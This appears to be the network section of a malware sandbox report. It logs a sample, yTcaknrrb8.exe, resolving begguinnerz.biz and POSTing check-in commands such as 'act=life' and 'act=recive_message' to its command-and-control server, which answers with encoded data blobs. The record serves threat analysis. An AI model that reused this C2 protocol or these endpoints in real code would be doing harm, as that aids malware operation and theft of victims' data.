Jan 1, 2025 16:55:05.510071039 CET	49972	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:05.510071039 CET	49972	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:05.510107994 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.510128975 CET	443	49972	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.729949951 CET	49973	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:05.730004072 CET	443	49973	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:05.730094910 CET	49973	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:05.730403900 CET	49973	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:05.730420113 CET	443	49973	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:06.188987970 CET	443	49973	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:06.189172983 CET	49973	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:06.192794085 CET	49973	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:06.192802906 CET	443	49973	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:06.193037987 CET	443	49973	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:06.194494963 CET	49973	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:06.194664001 CET	49973	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:06.194698095 CET	443	49973	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:06.717407942 CET	443	49973	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:06.717505932 CET	443	49973	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:06.717578888 CET	49973	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:06.720900059 CET	49973	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:06.720921993 CET	443	49973	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:06.825349092 CET	49974	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:06.825395107 CET	443	49974	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:06.825489998 CET	49974	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:06.825748920 CET	49974	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:06.825762033 CET	443	49974	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:07.322268009 CET	443	49974	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:07.322380066 CET	49974	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:07.323754072 CET	49974	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:07.323764086 CET	443	49974	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:07.323992014 CET	443	49974	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:07.325160027 CET	49974	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:07.325313091 CET	49974	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:07.325344086 CET	443	49974	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:07.325402975 CET	49974	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:07.367341042 CET	443	49974	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:08.180105925 CET	443	49974	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:08.180190086 CET	443	49974	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:08.180254936 CET	49974	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:08.180419922 CET	49974	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:08.180434942 CET	443	49974	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:08.349158049 CET	49975	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:08.349200964 CET	443	49975	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:08.349275112 CET	49975	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:08.349589109 CET	49975	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:08.349605083 CET	443	49975	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:08.814352989 CET	443	49975	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:08.814491034 CET	49975	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:08.815567970 CET	49975	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:08.815581083 CET	443	49975	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:08.815818071 CET	443	49975	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:08.816951990 CET	49975	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:08.817127943 CET	49975	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:08.817159891 CET	443	49975	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:08.817245960 CET	49975	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:08.817245960 CET	49975	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:08.817257881 CET	443	49975	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:08.863337040 CET	443	49975	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:09.431704998 CET	443	49975	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:09.431797981 CET	443	49975	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:09.431857109 CET	49975	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:09.431925058 CET	49975	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:09.431943893 CET	443	49975	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:09.964925051 CET	49976	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:09.964972019 CET	443	49976	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:09.965038061 CET	49976	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:09.965419054 CET	49976	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:09.965432882 CET	443	49976	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:10.422573090 CET	443	49976	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:10.422698021 CET	49976	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:10.424163103 CET	49976	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:10.424174070 CET	443	49976	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:10.425354004 CET	443	49976	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:10.427061081 CET	49976	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:10.427061081 CET	49976	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:10.427109003 CET	443	49976	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:10.873065948 CET	443	49976	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:10.873171091 CET	443	49976	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:10.873236895 CET	49976	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:10.875654936 CET	49976	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:10.875674963 CET	443	49976	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:10.999573946 CET	49977	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:10.999622107 CET	443	49977	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:10.999789000 CET	49977	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:11.000029087 CET	49977	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:11.000041008 CET	443	49977	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:11.482515097 CET	443	49977	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:11.482595921 CET	49977	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:11.483957052 CET	49977	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:11.483968973 CET	443	49977	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:11.484193087 CET	443	49977	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:11.485352993 CET	49977	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:11.485481024 CET	49977	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:11.485486031 CET	443	49977	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:12.246428967 CET	443	49977	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:12.246519089 CET	443	49977	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:12.246649981 CET	49977	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:12.246764898 CET	49977	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:12.246819019 CET	443	49977	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:12.321888924 CET	49978	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:12.321938038 CET	443	49978	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:12.322009087 CET	49978	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:12.322277069 CET	49978	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:12.322293043 CET	443	49978	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:12.804580927 CET	443	49978	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:12.804646015 CET	49978	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:12.805958986 CET	49978	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:12.805969954 CET	443	49978	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:12.806361914 CET	443	49978	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:12.807404995 CET	49978	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:12.807435036 CET	49978	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:12.807476044 CET	443	49978	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:13.235141993 CET	443	49978	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:13.235240936 CET	443	49978	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:13.235340118 CET	49978	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:13.235541105 CET	49978	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:13.235560894 CET	443	49978	104.21.92.91	192.168.2.7
Jan 1, 2025 16:55:13.235573053 CET	49978	443	192.168.2.7	104.21.92.91
Jan 1, 2025 16:55:13.235579014 CET	443	49978	104.21.92.91	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 16:55:03.099385977 CET	63966	53	192.168.2.7	1.1.1.1
Jan 1, 2025 16:55:03.114255905 CET	53	63966	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 1, 2025 16:55:03.099385977 CET	192.168.2.7	1.1.1.1	0x2db8	Standard query (0)	begguinnerz.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 1, 2025 16:55:03.114255905 CET	1.1.1.1	192.168.2.7	0x2db8	No error (0)	begguinnerz.biz		104.21.92.91	A (IP address)	IN (0x0001)	false
Jan 1, 2025 16:55:03.114255905 CET	1.1.1.1	192.168.2.7	0x2db8	No error (0)	begguinnerz.biz		172.67.190.223	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

begguinnerz.biz

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49971	104.21.92.91	443	2436	C:\Users\user\Desktop\yTcaknrrb8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 15:55:03 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: begguinnerz.biz
2025-01-01 15:55:03 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-01 15:55:04 UTC	1125	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 15:55:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nhl52gc3gt8im992d694habfsb; expires=Sun, 27 Apr 2025 09:41:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ghPwTZowIN6NudscYFOQfzHiq3LfnXQ%2FKv0KyeqyCkrVLe0EHvl9w7HFLSUnfIcYL7QanRzq6u8IDlEDGNEyQ6Zl2bTJ78%2FIBeN170CBvtYR%2Fa%2BbxgLPW5Nh0NrS34vvgvE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3b1041af44283-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1742&min_rtt=1742&rtt_var=654&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=906&delivery_rate=1672394&cwnd=242&unsent_bytes=0&cid=51d850333dc594ea&ts=481&x=0"
2025-01-01 15:55:04 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-01 15:55:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49972	104.21.92.91	443	2436	C:\Users\user\Desktop\yTcaknrrb8.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 15:55:04 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: begguinnerz.biz
2025-01-01 15:55:04 UTC	86	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 64 64 36 64 33 33 63 66 65 30 61 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--dd6d33cfe0a0&j=b9abc76ce53b6fc3a03566f8f764f5ea
2025-01-01 15:55:05 UTC	1121	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 15:55:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kvuk5o4ll77od91uqll75k8v63; expires=Sun, 27 Apr 2025 09:41:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VVTUOiGT66v6xB3TGiu1t66vwPynrTinU8ZizKv3vSYsVKQu%2BdXGIRjnsO3G4VRtwTgyzt17rQFZjYac5sOMZNXTKEE1kaAxzznFMiLNYTdLd%2BhZdYsL6CPxGT0JIHUeyvs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb3b10aaff04263-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1861&min_rtt=1808&rtt_var=716&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=985&delivery_rate=1615044&cwnd=247&unsent_bytes=0&cid=04dd592877a9dc12&ts=756&x=0"
2025-01-01 15:55:05 UTC	248	IN	Data Raw: 34 33 30 63 0d 0a 72 68 37 6c 5a 59 32 75 62 52 72 5a 49 36 2f 64 34 37 32 76 73 38 6d 57 6b 33 4a 31 36 46 49 2b 30 4f 79 73 49 6c 6e 75 46 38 7a 56 50 4a 4e 48 74 35 70 42 4f 4b 70 47 6a 65 65 46 33 4d 50 41 72 4c 71 78 45 78 48 4b 61 46 69 78 67 4e 39 48 64 63 78 68 6f 59 77 6b 67 77 54 68 33 51 67 32 2b 30 62 58 2f 39 6e 6d 31 4a 47 73 2b 4c 46 49 56 34 30 34 58 4c 47 41 7a 6b 4d 79 67 57 65 67 7a 58 61 4a 41 75 58 4c 44 6e 36 34 54 38 4b 34 68 74 6a 4f 32 61 66 2f 2f 68 6f 59 79 6e 34 63 74 5a 61 4f 47 48 75 6a 63 72 6a 50 55 34 51 57 35 6f 77 51 4e 71 49 42 79 72 50 42 68 34 33 53 72 50 54 2f 46 42 47 44 4f 6c 61 34 69 4d 39 47 4d 35 35 2b 71 73 5a 32 68 77 48 6b 77 51 64 71 74 55 58 46 73 34 44 53 7a 70 48 6c 74 50 59 49 56 39 Data Ascii: 430crh7lZY2ubRrZI6/d472vs8mWk3J16FI+0OysIlnuF8zVPJNHt5pBOKpGjeeF3MPArLqxExHKaFixgN9HdcxhoYwkgwTh3Qg2+0bX/9nm1JGs+LFIV404XLGAzkMygWegzXaJAuXLDn64T8K4htjO2af//hoYyn4ctZaOGHujcrjPU4QW5owQNqIByrPBh43SrPT/FBGDOla4iM9GM55+qsZ2hwHkwQdqtUXFs4DSzpHltPYIV9
2025-01-01 15:55:05 UTC	1369	IN	Data Raw: 4a 77 44 34 43 4e 33 31 45 75 67 57 57 6f 6a 47 50 4a 48 71 2f 4c 41 7a 6a 6a 41 63 57 7a 6a 39 72 4f 33 71 7a 31 38 51 49 59 69 6a 4e 55 75 6f 72 45 54 7a 53 44 65 36 54 4c 64 49 34 41 34 4d 73 48 66 72 52 43 6a 66 48 42 32 4e 57 52 38 37 54 52 41 42 53 4a 4a 46 47 6a 7a 74 45 4f 49 73 78 79 6f 6f 77 6b 78 77 48 68 7a 51 4a 34 71 55 6e 47 74 49 54 4e 78 74 69 6d 2b 66 45 64 48 59 55 7a 58 4c 57 45 78 45 38 78 69 48 69 6a 79 6e 79 48 52 36 47 4d 43 47 44 37 47 59 32 63 68 4d 2f 4b 33 62 32 32 79 31 41 49 78 43 6b 63 74 59 4b 4f 47 48 75 45 63 4b 33 50 64 34 67 45 35 38 63 64 65 4b 6c 48 77 4c 71 54 32 63 6a 66 6f 66 66 6a 47 68 6d 4d 4d 31 57 35 68 38 74 48 50 38 77 37 37 73 74 6b 78 31 2b 76 37 51 4a 7a 74 30 76 61 76 38 48 41 67 38 6a 72 38 2f 31 51 54 Data Ascii: JwD4CN31EugWWojGPJHq/LAzjjAcWzj9rO3qz18QIYijNUuorETzSDe6TLdI4A4MsHfrRCjfHB2NWR87TRABSJJFGjztEOIsxyoowkxwHhzQJ4qUnGtITNxtim+fEdHYUzXLWExE8xiHijynyHR6GMCGD7GY2chM/K3b22y1AIxCkctYKOGHuEcK3Pd4gE58cdeKlHwLqT2cjfoffjGhmMM1W5h8tHP8w77stkx1+v7QJzt0vav8HAg8jr8/1QT
2025-01-01 15:55:05 UTC	1369	IN	Data Raw: 34 7a 6f 41 41 50 4a 51 31 39 6f 78 4e 6b 41 79 74 2b 51 78 32 74 55 62 62 2f 35 36 52 31 4a 47 73 2b 4c 46 49 56 34 63 34 57 62 65 42 7a 30 6f 31 69 58 2b 69 78 48 4b 45 46 65 44 49 44 33 53 7a 53 38 43 78 68 64 66 45 32 71 44 79 38 52 45 64 79 6e 34 63 74 5a 61 4f 47 48 75 34 63 71 4c 42 63 38 55 79 37 4d 49 42 66 36 30 42 30 76 47 59 6e 38 72 64 36 36 79 78 48 42 36 4b 4f 31 61 32 6a 73 6c 4e 50 6f 39 79 72 63 46 37 6a 51 6e 6f 79 41 4e 78 74 6b 66 4e 75 49 58 61 33 39 53 69 2b 50 31 51 57 63 6f 33 52 50 4c 57 6a 6d 38 38 6d 6e 61 42 7a 32 32 4f 52 2f 43 43 46 6a 69 38 54 59 33 6e 77 64 6a 49 32 61 44 79 2b 52 41 46 6a 7a 35 58 73 34 54 49 51 54 61 41 63 36 37 4e 66 49 45 4c 37 38 73 49 61 71 6c 45 79 36 32 4c 6e 34 4f 52 72 4f 79 78 53 46 65 38 49 45 Data Ascii: 4zoAAPJQ19oxNkAyt+Qx2tUbb/56R1JGs+LFIV4c4WbeBz0o1iX+ixHKEFeDID3SzS8CxhdfE2qDy8REdyn4ctZaOGHu4cqLBc8Uy7MIBf60B0vGYn8rd66yxHB6KO1a2jslNPo9yrcF7jQnoyANxtkfNuIXa39Si+P1QWco3RPLWjm88mnaBz22OR/CCFji8TY3nwdjI2aDy+RAFjz5Xs4TIQTaAc67NfIEL78sIaqlEy62Ln4ORrOyxSFe8IE
2025-01-01 15:55:05 UTC	1369	IN	Data Raw: 54 7a 4b 44 66 61 62 44 63 34 4d 4a 36 63 6f 43 66 62 52 4c 33 37 65 50 30 73 62 65 6f 4f 62 78 48 52 4f 47 4e 46 53 35 68 49 34 4f 65 34 74 74 37 70 51 38 73 67 72 67 7a 41 78 75 2b 31 36 44 70 73 48 59 77 5a 48 7a 74 50 30 65 46 34 55 38 55 4c 6d 47 7a 30 77 31 69 33 43 6e 78 48 53 56 42 75 76 45 44 6e 61 30 51 4d 6d 36 68 4e 76 4b 31 61 33 37 73 56 35 58 6a 53 67 63 36 73 37 68 5a 77 37 4f 56 4a 53 4d 59 38 6b 65 72 38 73 44 4f 4f 4d 42 77 62 79 4e 31 38 4c 58 6f 76 6a 37 47 52 79 47 4f 31 69 2b 68 38 74 47 4f 6f 6c 77 72 38 68 77 6a 51 48 73 7a 77 42 33 74 45 6d 4e 38 63 48 59 31 5a 48 7a 74 4e 51 48 48 49 51 32 48 4b 33 41 31 77 41 38 67 44 58 32 6a 48 43 4f 41 65 6e 4a 41 33 6d 39 53 63 69 33 68 64 37 4c 31 36 6a 37 39 52 55 57 68 54 52 51 76 49 54 Data Ascii: TzKDfabDc4MJ6coCfbRL37eP0sbeoObxHROGNFS5hI4Oe4tt7pQ8sgrgzAxu+16DpsHYwZHztP0eF4U8ULmGz0w1i3CnxHSVBuvEDna0QMm6hNvK1a37sV5XjSgc6s7hZw7OVJSMY8ker8sDOOMBwbyN18LXovj7GRyGO1i+h8tGOolwr8hwjQHszwB3tEmN8cHY1ZHztNQHHIQ2HK3A1wA8gDX2jHCOAenJA3m9Sci3hd7L16j79RUWhTRQvIT
2025-01-01 15:55:05 UTC	1369	IN	Data Raw: 58 36 38 79 33 4f 44 41 4f 50 4b 41 48 36 36 52 4d 65 7a 68 74 72 47 33 71 65 30 76 31 41 51 6b 6e 41 45 38 71 44 46 55 79 79 50 65 36 58 61 5a 38 63 59 6f 64 56 50 66 37 63 42 6c 66 2b 43 31 4d 62 56 71 2f 6a 78 46 42 71 4b 49 6c 4f 31 69 63 64 4c 4b 59 5a 79 71 63 64 30 6a 41 6a 70 33 67 4e 32 71 55 54 66 72 63 47 52 6a 64 61 7a 74 4b 6c 51 49 59 30 67 54 4c 48 4d 2f 31 59 34 6d 6e 36 6a 77 44 79 59 53 66 61 4d 43 48 54 37 47 59 32 35 6a 74 62 4f 33 71 72 39 2f 52 30 53 67 7a 56 64 74 49 72 45 53 6a 75 4b 63 36 2f 4a 64 6f 51 47 35 63 55 49 63 4c 78 43 33 2f 2f 50 6e 38 72 4a 36 36 79 78 4f 52 43 59 50 6b 7a 79 6b 59 42 5a 65 34 74 35 37 70 51 38 67 77 33 67 79 41 68 30 76 55 54 4c 73 6f 44 51 7a 4e 47 6b 38 50 6f 5a 45 59 73 39 57 62 2b 4b 33 45 6f 77 Data Ascii: X68y3ODAOPKAH66RMezhtrG3qe0v1AQknAE8qDFUyyPe6XaZ8cYodVPf7cBlf+C1MbVq/jxFBqKIlO1icdLKYZyqcd0jAjp3gN2qUTfrcGRjdaztKlQIY0gTLHM/1Y4mn6jwDyYSfaMCHT7GY25jtbO3qr9/R0SgzVdtIrESjuKc6/JdoQG5cUIcLxC3//Pn8rJ66yxORCYPkzykYBZe4t57pQ8gw3gyAh0vUTLsoDQzNGk8PoZEYs9Wb+K3Eow
2025-01-01 15:55:05 UTC	1369	IN	Data Raw: 78 38 6a 51 4c 6c 77 51 78 33 75 46 50 4d 75 5a 50 66 77 4e 75 35 2f 76 6f 56 47 6f 63 39 58 37 53 49 78 55 77 70 68 58 57 74 78 7a 7a 4a 52 2b 6a 55 54 79 44 37 59 74 71 70 69 39 6a 42 78 36 44 31 38 67 59 61 6d 6e 41 53 38 70 2f 4a 55 58 76 55 59 37 37 62 65 35 68 4a 39 6f 77 49 64 50 73 5a 6a 62 6d 49 32 63 72 58 70 65 62 30 46 68 69 46 4f 56 57 32 68 73 31 41 50 34 68 79 71 38 39 77 6a 41 44 73 77 77 74 78 74 55 6a 43 2f 38 2b 66 79 73 6e 72 72 4c 45 78 44 49 6b 38 55 66 4b 52 67 46 6c 37 69 33 6e 75 6c 44 79 4c 43 65 72 4d 42 58 36 2f 52 4d 75 31 68 4e 2f 47 30 71 54 77 39 78 51 59 69 6a 74 56 73 34 6a 4c 53 6a 43 4b 65 4b 33 4b 65 73 64 4a 72 38 73 58 4f 4f 4d 42 37 61 53 4d 30 38 71 52 74 4c 72 6f 55 42 43 47 63 41 54 79 68 63 4a 45 50 49 78 34 72 Data Ascii: x8jQLlwQx3uFPMuZPfwNu5/voVGoc9X7SIxUwphXWtxzzJR+jUTyD7Ytqpi9jBx6D18gYamnAS8p/JUXvUY77be5hJ9owIdPsZjbmI2crXpeb0FhiFOVW2hs1AP4hyq89wjADswwtxtUjC/8+fysnrrLExDIk8UfKRgFl7i3nulDyLCerMBX6/RMu1hN/G0qTw9xQYijtVs4jLSjCKeK3KesdJr8sXOOMB7aSM08qRtLroUBCGcATyhcJEPIx4r
2025-01-01 15:55:05 UTC	1369	IN	Data Raw: 41 39 4e 30 5a 64 61 74 47 6a 59 44 50 6e 39 57 52 38 37 54 45 45 78 6d 45 4e 30 71 6a 77 2b 6c 57 4d 59 74 6c 71 64 74 7a 78 30 6d 76 79 6b 38 67 36 41 2b 4e 75 35 43 66 6c 59 48 35 72 36 52 44 51 4e 70 69 51 2f 79 58 6a 6c 5a 37 31 43 66 67 6a 47 37 48 58 36 2b 4c 44 47 71 70 52 38 36 70 67 70 6a 7a 37 34 7a 75 2f 42 59 41 6d 77 35 69 74 5a 54 44 52 69 79 64 4f 62 76 50 63 6f 6b 41 2b 59 78 42 4f 4c 51 42 6c 59 62 42 6c 34 33 75 35 62 54 70 55 45 2f 4b 42 56 2b 38 67 4d 6c 57 4b 73 46 53 74 4d 46 36 6b 42 61 76 67 6b 39 2b 2b 78 6d 64 38 63 48 62 33 4a 48 7a 70 4b 4e 4c 51 74 6c 6e 44 4f 43 52 67 46 6c 37 6d 6a 58 32 6e 6a 4c 48 46 61 2b 55 54 7a 2b 34 55 39 2b 35 67 73 6e 4f 6c 70 58 4b 33 78 63 52 6a 7a 64 4d 38 4b 44 46 56 44 7a 4d 4f 2b 37 44 50 4e Data Ascii: A9N0ZdatGjYDPn9WR87TEExmEN0qjw+lWMYtlqdtzx0mvyk8g6A+Nu5CflYH5r6RDQNpiQ/yXjlZ71CfgjG7HX6+LDGqpR86pgpjz74zu/BYAmw5itZTDRiydObvPcokA+YxBOLQBlYbBl43u5bTpUE/KBV+8gMlWKsFStMF6kBavgk9++xmd8cHb3JHzpKNLQtlnDOCRgFl7mjX2njLHFa+UTz+4U9+5gsnOlpXK3xcRjzdM8KDFVDzMO+7DPN
2025-01-01 15:55:05 UTC	1369	IN	Data Raw: 51 54 69 39 41 5a 58 74 7a 35 2f 4a 77 4f 75 73 6f 55 4a 4d 33 32 4d 4c 34 74 7a 52 44 69 4c 4d 59 2b 36 55 4c 73 6c 48 2f 59 78 58 4f 50 78 43 33 36 32 48 33 4e 76 53 37 4d 72 50 4e 78 6d 4e 4d 55 71 69 6d 63 45 50 46 62 70 55 6b 50 4a 70 68 41 6e 68 79 78 6c 70 2b 77 2b 4e 73 4d 47 48 39 4a 48 6a 74 4d 35 65 56 35 4a 77 42 50 4b 37 7a 55 34 31 69 32 4f 2f 67 56 75 4a 41 4f 37 61 48 32 2b 30 44 75 4f 4a 6f 4a 2b 44 6b 61 32 30 71 55 4a 5a 79 6a 52 4e 38 74 61 65 45 6d 44 5a 4a 76 6d 63 4c 70 68 4a 39 6f 77 5a 4f 4f 4d 54 67 2f 2b 54 6e 35 57 52 37 50 66 6a 41 68 47 4a 4a 6c 2f 31 73 50 42 6e 4e 59 74 30 75 4e 78 78 69 79 62 73 33 51 56 47 68 56 54 4f 73 59 2f 59 32 38 44 72 75 72 45 66 56 39 49 4a 48 50 72 4f 38 51 35 37 6c 44 58 32 6a 45 6d 45 43 65 48 Data Ascii: 